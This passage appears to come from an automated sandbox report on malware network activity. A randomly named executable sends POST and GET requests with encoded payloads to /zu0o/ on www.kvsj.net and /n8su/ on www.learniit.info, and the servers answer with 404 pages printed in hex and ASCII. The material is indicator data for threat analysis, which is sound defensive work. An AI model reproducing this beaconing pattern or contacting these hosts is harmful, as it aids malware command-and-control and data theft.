                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 57 38 37 59 65 42 75 63 47 78 77 4e 45 63 41 6f 37 61 71 73 73 76 32 33 4b 49 63 64 68 68 35 64 66 4e 73 33 6e 59 41 45 78 4e 6a 47 4f 76 35 54 52 71 37 69 34 72 44 32 36 64 35 51 6a 53 41 61 43 75 6a 38 4f 49 79 77 4d 54 57 48 59 78 45 41 4b 65 64 5a 47 74 51 5a 52 46 36 5a 33 30 76 6f 55 61 30 52 79 68 7a 58 4e 4a 38 7a 4a 6f 2b 64 31 74 55 41 70 71 6d 66 6b 47 73 36 72 41 76 54 39 75 57 68 79 35 6e 45 64 68 4d 54 55 65 72 43 43 72 48 4a 50 55 64 73 46 72 67 63 68 30 75 4e 6b 61 6c 4d 34 66 51 59 62 77 77 39 47 32 51 57 69 77 5a 48 57 30 6e 58 45 55 79 56 31 53 79 39 66 54 59 4c 44 67 4f 69 53 33 5a 79 72 4a 68 57 38 51 3d 3d
                                                                                  Data Ascii: PHM8hj-=W87YeBucGxwNEcAo7aqssv23KIcdhh5dfNs3nYAExNjGOv5TRq7i4rD26d5QjSAaCuj8OIywMTWHYxEAKedZGtQZRF6Z30voUa0RyhzXNJ8zJo+d1tUApqmfkGs6rAvT9uWhy5nEdhMTUerCCrHJPUdsFrgch0uNkalM4fQYbww9G2QWiwZHW0nXEUyV1Sy9fTYLDgOiS3ZyrJhW8Q==
                                                                                  Dec 9, 2024 06:58:03.076719999 CET479INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 09 Dec 2024 05:58:02 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 315
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.749929173.236.199.97805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:58:04.655942917 CET834OUTPOST /zu0o/ HTTP/1.1
                                                                                  Host: www.kvsj.net
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.kvsj.net
                                                                                  Referer: http://www.kvsj.net/zu0o/
                                                                                  Content-Length: 240
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 57 38 37 59 65 42 75 63 47 78 77 4e 47 2f 6f 6f 30 5a 79 73 39 66 33 46 50 49 63 64 75 42 35 5a 66 4e 77 33 6e 61 73 75 78 2f 33 47 4f 4b 46 54 66 49 54 69 35 72 44 32 69 74 34 37 38 43 41 76 43 75 76 43 4f 4a 4f 77 4d 54 79 48 59 77 30 41 4b 76 64 61 48 39 51 62 5a 6c 36 62 6f 45 76 6f 55 61 30 52 79 68 57 79 4e 4b 4d 7a 4a 63 36 64 30 4a 41 44 71 71 6e 74 6a 47 73 36 76 41 75 61 39 75 57 35 79 37 43 72 64 6c 38 54 55 64 2f 43 44 35 6a 4f 56 45 64 69 4b 4c 67 43 67 33 43 46 75 59 35 67 38 4a 41 4e 64 79 4a 43 4f 67 52 30 34 53 56 72 49 6c 66 73 41 57 57 6a 69 30 76 49 64 53 63 54 4f 43 36 44 4e 41 38 59 6d 62 41 53 71 6f 55 74 36 54 63 42 46 46 42 73 59 33 42 57 55 4c 76 35 61 72 38 3d
                                                                                  Data Ascii: PHM8hj-=W87YeBucGxwNG/oo0Zys9f3FPIcduB5ZfNw3nasux/3GOKFTfITi5rD2it478CAvCuvCOJOwMTyHYw0AKvdaH9QbZl6boEvoUa0RyhWyNKMzJc6d0JADqqntjGs6vAua9uW5y7Crdl8TUd/CD5jOVEdiKLgCg3CFuY5g8JANdyJCOgR04SVrIlfsAWWji0vIdScTOC6DNA8YmbASqoUt6TcBFFBsY3BWULv5ar8=
                                                                                  Dec 9, 2024 06:58:05.808597088 CET479INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 09 Dec 2024 05:58:05 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 315
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.749936173.236.199.97805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:58:07.321552038 CET1847OUTPOST /zu0o/ HTTP/1.1
                                                                                  Host: www.kvsj.net
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.kvsj.net
                                                                                  Referer: http://www.kvsj.net/zu0o/
                                                                                  Content-Length: 1252
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 57 38 37 59 65 42 75 63 47 78 77 4e 47 2f 6f 6f 30 5a 79 73 39 66 33 46 50 49 63 64 75 42 35 5a 66 4e 77 33 6e 61 73 75 78 2f 76 47 4f 34 39 54 66 76 6e 69 72 62 44 32 38 64 35 63 38 43 41 32 43 75 6e 65 4f 4a 43 67 4d 56 32 48 5a 58 63 41 62 4e 6c 61 49 39 51 62 47 56 36 61 33 30 76 48 55 63 55 56 79 68 6d 79 4e 4b 4d 7a 4a 64 4b 64 7a 64 55 44 6c 4b 6d 66 6b 47 73 49 72 41 75 79 39 75 4f 44 79 37 47 42 61 55 41 54 58 39 76 43 4f 71 48 4f 65 45 63 45 50 4c 68 52 67 33 50 62 75 5a 56 73 38 4a 63 6e 64 79 68 43 66 48 49 39 2f 67 6c 72 4c 6d 33 4e 65 45 32 38 69 56 50 44 61 44 67 4f 41 54 53 32 45 78 67 51 6a 62 77 4a 6e 2f 67 6f 6d 6c 55 75 4f 31 31 30 5a 78 68 59 42 62 2f 4a 5a 39 2b 49 65 50 62 64 77 5a 37 6a 41 4e 35 44 4b 44 47 34 38 6a 71 4c 32 4a 2f 6e 55 77 44 37 62 57 34 64 6b 4e 49 49 4f 5a 72 72 78 31 67 5a 70 36 50 63 75 78 37 4a 54 71 37 4b 55 77 4d 57 65 6f 47 7a 52 72 78 51 55 37 59 4d 59 71 59 2b 36 74 4a 4a 63 78 49 66 6c 47 6e 41 7a 74 61 75 38 4a 2b 77 4a 44 [TRUNCATED]
                                                                                  Data Ascii: PHM8hj-=W87YeBucGxwNG/oo0Zys9f3FPIcduB5ZfNw3nasux/vGO49TfvnirbD28d5c8CA2CuneOJCgMV2HZXcAbNlaI9QbGV6a30vHUcUVyhmyNKMzJdKdzdUDlKmfkGsIrAuy9uODy7GBaUATX9vCOqHOeEcEPLhRg3PbuZVs8JcndyhCfHI9/glrLm3NeE28iVPDaDgOATS2ExgQjbwJn/gomlUuO110ZxhYBb/JZ9+IePbdwZ7jAN5DKDG48jqL2J/nUwD7bW4dkNIIOZrrx1gZp6Pcux7JTq7KUwMWeoGzRrxQU7YMYqY+6tJJcxIflGnAztau8J+wJDAJ2K+RR5Znlm5C6i0iqJfuCIJ4r2/cxnKzt1kDGN2ORZdcHbM/3T9Uk7Sv2cwiZBj9DvMHk8gzNKb8d+MBwT+1+UnF1mJ9OMtqECnJJNNftf0nk/weXlV6vWVKc40SrnoH9X7ZuTQxkLpM+vzs1o89a3OaMVIsROqrdfxfJpIP/FBCfCEqO8a//l0oA3/2EzowHoxTfRFe3rLSx2VoYenoEFVqeTuwVH8lv1jn3czCxx8N0ESASQO4kkKY01Q6zs9YdMaQX9Zmug3Ur8KbqLRFaj/Oj9Faubg/XtctjGj5WQif/cFJo9uoElvOzLVjGLAJPW9NcoLaNfdxHq4CQzMF1OO+U/vgKPlVFgbolIE5/J2LS4G1Z26+renNy36o5DrPH9/j++P/3KmQx4Q8YfgXltBckdPefXU5aUTQU/K1/fbi8lgf3aVjrK0g0RyBIQKw5cnERV/+TY0QntUoRQZkyhNiRiF+TLlU4vw/FfhUE6Wbd4rs9Om3pH4HgnkZPENvjSGu9IhqbGGFovaQIrnRhDfmjJNZF6lRFYsBq8mODyWDCUg+LXEWD/wQuD3vMdYwX0stTsWNVgTFntjNlHb0kLPTbEIDgICESjtkaqDpWtQ+4efrtd6pPvz24agrpkYClQwV2i/648YfU0FbRvGzzxn+BjtGnKkO [TRUNCATED]
                                                                                  Dec 9, 2024 06:58:08.416271925 CET479INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 09 Dec 2024 05:58:08 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 315
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.749945173.236.199.97805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:58:09.988408089 CET555OUTGET /zu0o/?PHM8hj-=b+T4d2yBdzwUctMd/6rbp8e/L5VppQdPUeEaq4sP5cuMDP5lcr7xrt20xN8o8Q5MDPDMLZuxAQ7GazkQMM9RW/M6GCGyp3PrdvQ7twyTbIssAsfn0uYUlKbzmGUUwxyTqeuUq5+1WDkR&tHfx=9byl HTTP/1.1
                                                                                  Host: www.kvsj.net
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Dec 9, 2024 06:58:11.095673084 CET479INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 09 Dec 2024 05:58:10 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 315
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.749962203.161.42.73805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:58:17.011692047 CET829OUTPOST /n8su/ HTTP/1.1
                                                                                  Host: www.learniit.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.learniit.info
                                                                                  Referer: http://www.learniit.info/n8su/
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 6f 48 35 61 4d 31 6a 6b 68 64 55 6a 5a 4e 51 6e 4b 78 44 44 48 31 34 71 6d 49 4a 68 2b 51 7a 77 70 5a 35 76 6f 2b 63 55 7a 35 62 6a 41 6c 75 44 43 50 49 79 75 48 78 30 45 4e 59 6e 38 78 49 44 63 65 51 69 76 53 44 4a 66 39 4b 4f 73 39 76 64 31 45 36 74 41 4e 38 50 6a 49 33 69 61 35 6c 54 6e 6d 63 47 43 48 34 49 44 71 54 45 72 39 61 64 79 73 44 63 51 78 66 35 6c 36 4f 51 4a 69 53 62 5a 72 46 33 54 2f 33 4f 64 64 2b 64 37 33 77 6a 31 4b 55 33 42 4c 4c 55 45 71 46 36 69 73 75 41 75 57 58 4b 6b 38 42 77 58 65 57 6a 31 41 57 50 4b 41 68 42 2b 36 66 70 6c 47 62 30 73 48 51 33 2b 79 63 4c 73 71 77 62 4b 71 69 4f 41 31 46 38 68 77 3d 3d
                                                                                  Data Ascii: PHM8hj-=oH5aM1jkhdUjZNQnKxDDH14qmIJh+QzwpZ5vo+cUz5bjAluDCPIyuHx0ENYn8xIDceQivSDJf9KOs9vd1E6tAN8PjI3ia5lTnmcGCH4IDqTEr9adysDcQxf5l6OQJiSbZrF3T/3Odd+d73wj1KU3BLLUEqF6isuAuWXKk8BwXeWj1AWPKAhB+6fplGb0sHQ3+ycLsqwbKqiOA1F8hw==
                                                                                  Dec 9, 2024 06:58:18.241955042 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 09 Dec 2024 05:58:18 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                  Dec 9, 2024 06:58:18.241981983 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                                  Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                                  Dec 9, 2024 06:58:18.241996050 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                                  Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                                  Dec 9, 2024 06:58:18.242103100 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                                  Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                                                  Dec 9, 2024 06:58:18.242117882 CET896INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                                                  Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                                                  Dec 9, 2024 06:58:18.242136002 CET1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                                                  Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                                                  Dec 9, 2024 06:58:18.242153883 CET224INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                                                  Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.0
                                                                                  Dec 9, 2024 06:58:18.242166996 CET1236INData Raw: 30 33 34 32 39 2c 33 37 2e 31 38 31 35 39 20 2d 33 2e 30 36 34 31 35 34 2c 35 34 2e 38 36 30 33 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74
                                                                                  Data Ascii: 03429,37.18159 -3.064154,54.86032" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206
                                                                                  Dec 9, 2024 06:58:18.242178917 CET224INData Raw: 2e 32 33 32 36 36 20 63 20 2d 35 2e 34 34 30 31 39 32 2c 31 31 2e 35 36 32 35 31 20 2d 31 30 2e 38 38 30 39 35 31 2c 32 33 2e 31 32 36 32 32 20 2d 31 35 2e 38 39 39 36 35 37 2c 33 33 2e 35 36 33 36 38 20 2d 35 2e 30 31 38 37 30 36 2c 31 30 2e 34
                                                                                  Data Ascii: .23266 c -5.440192,11.56251 -10.880951,23.12622 -15.899657,33.56368 -5.018706,10.43747 -9.614414,19.74672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.0660
                                                                                  Dec 9, 2024 06:58:18.245033979 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
